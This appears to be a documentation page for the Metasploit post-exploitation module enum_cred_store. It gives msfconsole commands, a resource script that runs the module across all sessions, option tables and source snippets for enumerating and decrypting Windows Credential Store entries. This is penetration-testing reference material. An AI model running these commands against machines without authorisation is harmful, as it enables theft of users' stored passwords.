Windows Gather Credential Store Enumeration and Decryption Module - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/enum_cred_store metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Credential Store Enumeration and Decryption Module
Module: post/windows/gather/credentials/enum_cred_store
Source code: modules/post/windows/gather/credentials/enum_cred_store.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will enumerate the Microsoft Credential Store and decrypt the credentials. This module can only access credentials created by the user the process is running as. It cannot decrypt Domain Network Passwords, but will display the username and location.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/enum_cred_store

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/enum_cred_store
msf post(enum_cred_store) > show options
    ... show and set options ...
msf post(enum_cred_store) > set SESSION session-id
msf post(enum_cred_store) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/enum_cred_store")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/enum_cred_store post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/enum_cred_store

msf6 post(windows/gather/credentials/enum_cred_store) > show info

       Name: Windows Gather Credential Store Enumeration and Decryption Module
     Module: post/windows/gather/credentials/enum_cred_store
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Kx499

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will enumerate the Microsoft Credential Store and 
  decrypt the credentials. This module can only access credentials 
  created by the user the process is running as. It cannot decrypt 
  Domain Network Passwords, but will display the username and 
  location.

Module Options


This is a complete list of options available in the windows/gather/credentials/enum_cred_store post exploitation module:

msf6 post(windows/gather/credentials/enum_cred_store) > show options

Module options (post/windows/gather/credentials/enum_cred_store):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/enum_cred_store post exploitation module:

msf6 post(windows/gather/credentials/enum_cred_store) > show advanced

Module advanced options (post/windows/gather/credentials/enum_cred_store):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/enum_cred_store module can do:

msf6 post(windows/gather/credentials/enum_cred_store) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/enum_cred_store post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/enum_cred_store) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Error Decrypting


Here is a relevant code snippet related to the "Error Decrypting" error message:

66:	        str_data = raw
67:	      end
68:	    rescue
69:	      str_data = nil
70:	    end
71:	    return str_data || "Error Decrypting"
72:	  end
73:	
74:	  def decrypt_blob(daddr, dlen, type)
75:	    # type 0 = passport cred, type 1 = wininet cred
76:	    # set up entropy

Error adding credential to database for <VALUE>


Here is a relevant code snippet related to the "Error adding credential to database for <VALUE>" error message:

167:	        print_status("Credentials for #{ip_add} added to db")
168:	      else
169:	        return
170:	      end
171:	    rescue ::Exception => e
172:	      print_error("Error adding credential to database for #{cred["targetname"]}")
173:	      print_error(e.to_s)
174:	    end
175:	  end
176:	
177:	  def get_creds

This module requires WinXP or higher


Here is a relevant code snippet related to the "This module requires WinXP or higher" error message:

179:	    # call credenumerate to get the ptr needed
180:	    adv32 = session.railgun.advapi32
181:	    begin
182:	      ret = adv32.CredEnumerateA(nil, 0, 4, 4)
183:	    rescue Rex::Post::Meterpreter::RequestError => e
184:	      print_error("This module requires WinXP or higher")
185:	      print_error("CredEnumerateA() failed: #{e.class} #{e}")
186:	      ret = nil
187:	    end
188:	    if ret.nil?
189:	      count = 0

CredEnumerateA() failed: <E.CLASS> <E>


Here is a relevant code snippet related to the "CredEnumerateA() failed: <E.CLASS> <E>" error message:

180:	    adv32 = session.railgun.advapi32
181:	    begin
182:	      ret = adv32.CredEnumerateA(nil, 0, 4, 4)
183:	    rescue Rex::Post::Meterpreter::RequestError => e
184:	      print_error("This module requires WinXP or higher")
185:	      print_error("CredEnumerateA() failed: #{e.class} #{e}")
186:	      ret = nil
187:	    end
188:	    if ret.nil?
189:	      count = 0
190:	      arr_len = 0

Error Decrypting


Here is a relevant code snippet related to the "Error Decrypting" error message:

244:	        else
245:	          cred["password"] = "unsupported type"
246:	        end
247:	
248:	        # only add to array if there is a target name
249:	        unless cred["targetname"] == "Error Decrypting" or cred["password"] == "unsupported type"
250:	          print_status("Credential sucessfully decrypted for: #{cred["targetname"]}")
251:	          credentials << cred
252:	        end
253:	      end
254:	    else

No Credential are available for decryption


Here is a relevant code snippet related to the "No Credential are available for decryption" error message:

250:	          print_status("Credential sucessfully decrypted for: #{cred["targetname"]}")
251:	          credentials << cred
252:	        end
253:	      end
254:	    else
255:	      print_status("No Credential are available for decryption")
256:	    end
257:	    return credentials
258:	  end
259:	
260:	  def run

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Kx499

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.